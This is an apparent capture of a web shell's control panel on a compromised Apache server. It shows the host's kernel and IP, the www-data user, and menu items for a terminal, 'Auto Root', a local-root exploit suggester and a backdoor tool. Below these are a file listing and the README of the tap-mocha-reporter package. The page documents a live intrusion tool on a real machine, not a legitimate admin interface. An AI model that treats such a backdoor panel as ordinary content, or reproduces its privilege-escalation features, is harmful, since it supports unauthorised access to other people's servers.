Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
node-tap-mocha-reporter /
Delete
Unzip
Name
Size
Permission
Date
Action
README.md
509
B
-rw-r--r--
2022-03-05 06:45
changelog.Debian.gz
997
B
-rw-r--r--
2022-04-25 07:43
copyright
2.67
KB
-rw-r--r--
2022-04-25 07:34
Save
Rename
# tap-mocha-reporter Format a TAP stream using Mocha's set of reporters ## USAGE On the command line, pipe TAP in, and it'll do its thing. ```bash tap test/*.js | tap-mocha-reporter ``` You can also specify a reporter with the first argument. The default is `spec`. ```bash tap test/*.js | tap-mocha-reporter nyan ``` Programmatically, you can use this as a transform stream. ```javascript var TSR = require('tap-mocha-reporter') fs.createReadStream('saved-test-output.tap') .pipe(TSR('dot')) ```